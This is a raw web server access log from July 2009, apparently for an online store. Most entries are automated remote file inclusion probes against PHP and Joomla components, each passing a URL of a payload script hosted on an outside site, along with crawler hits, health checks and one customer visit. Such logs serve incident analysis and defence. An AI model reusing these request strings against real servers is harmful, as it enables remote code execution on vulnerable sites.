124.0.145.1 - - [01/Jul/2009:05:58:49 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:05:59:26 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:05:59:27 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:05:59:27 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [01/Jul/2009:05:59:45 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.140.23.185 - - [01/Jul/2009:05:59:49 -0400] "GET /logs/error_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:05:59:49 -0400] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:05:59:49 -0400] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:06:00:19 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.803"
72.30.161.243 - - [01/Jul/2009:05:59:52 -0400] "GET /logs/error_log.Q109062300 HTTP/1.0" 200 2793028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.145.1 - - [01/Jul/2009:06:00:27 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:06:00:27 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.161.243 - - [01/Jul/2009:05:59:50 -0400] "GET /logs/access_log.Q109062500 HTTP/1.0" 200 5016688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [01/Jul/2009:06:02:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [01/Jul/2009:06:04:13 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:04:13 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:04:15 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /logs/errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [01/Jul/2009:06:04:33 -0400] "GET /logs/errors.php?error=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.232.105.116 - - [01/Jul/2009:06:05:46 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:05:46 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:05:46 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:05:46 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.16 - - [01/Jul/2009:06:05:46 -0400] "GET /images/items/0032270_full.jpg HTTP/1.1" 200 6503 "-" "Googlebot-Image/1.0"
218.232.105.116 - - [01/Jul/2009:06:05:48 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:05:48 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:05:48 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:06:02 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:06:44 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:06:44 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:06:44 -0400] "GET /logs/access_log.Q109051200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:07:01 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:06:07:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [01/Jul/2009:06:08:26 -0400] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 7716 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:26 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:26 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:26 -0400] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:32 -0400] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 7716 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:38 -0400] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:08:39 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
60.43.229.5 - - [01/Jul/2009:06:09:28 -0400] "GET /logs/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
60.43.229.5 - - [01/Jul/2009:06:09:28 -0400] "GET /errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
60.43.229.5 - - [01/Jul/2009:06:09:28 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
60.43.229.5 - - [01/Jul/2009:06:09:28 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:06:12:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.43.229.5 - - [01/Jul/2009:06:13:17 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
60.43.229.5 - - [01/Jul/2009:06:13:18 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
124.0.136.1 - - [01/Jul/2009:06:14:10 -0400] "GET /logs/access_log.Q109051100//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
124.0.136.1 - - [01/Jul/2009:06:14:10 -0400] "GET /logs//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
124.0.136.1 - - [01/Jul/2009:06:14:10 -0400] "GET //login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
124.0.136.1 - - [01/Jul/2009:06:14:25 -0400] "GET /logs/access_log.Q109052800//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
202.58.86.29 - - [01/Jul/2009:06:14:53 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37789 "http://www.google.com.my/search?q=salesman+sign&hl=en&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:55 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:55 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:56 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:56 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:58 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:58 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:58 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:14:59 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:01 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
202.58.86.29 - - [01/Jul/2009:06:15:06 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
194.109.22.117 - - [01/Jul/2009:06:15:08 -0400] "GET /logs/error_log.Q109060700//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:06:15:09 -0400] "GET /logs//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:06:15:09 -0400] "GET //login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.816"
194.109.22.117 - - [01/Jul/2009:06:15:30 -0400] "GET /logs/error_log.Q109051100//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
194.109.22.113 - - [01/Jul/2009:06:15:45 -0400] "GET //login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.816"
194.109.22.113 - - [01/Jul/2009:06:15:45 -0400] "GET /logs/error_log.Q109060700//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
194.109.22.113 - - [01/Jul/2009:06:15:45 -0400] "GET /logs/error_log.Q109051100//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.816"
194.109.22.113 - - [01/Jul/2009:06:15:45 -0400] "GET /logs//login.php?_SESSION[docroot_path]=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.816"
209.59.12.99 - - [01/Jul/2009:06:17:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.136.16 - - [01/Jul/2009:06:18:36 -0400] "GET /logs/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.16 - - [01/Jul/2009:06:18:36 -0400] "GET /components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.16 - - [01/Jul/2009:06:18:36 -0400] "GET /logs/access_log.Q109052900/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
79.49.190.214 - - [01/Jul/2009:06:20:02 -0400] "GET /logs/access_log.Q109052700%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
79.49.190.214 - - [01/Jul/2009:06:20:02 -0400] "GET /logs/access_log.Q109051800%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:05 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:05 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:06 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:28 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:28 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:20:28 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:12 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:12 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:12 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:20 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:20 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:20 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:22 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:22 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:21:22 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
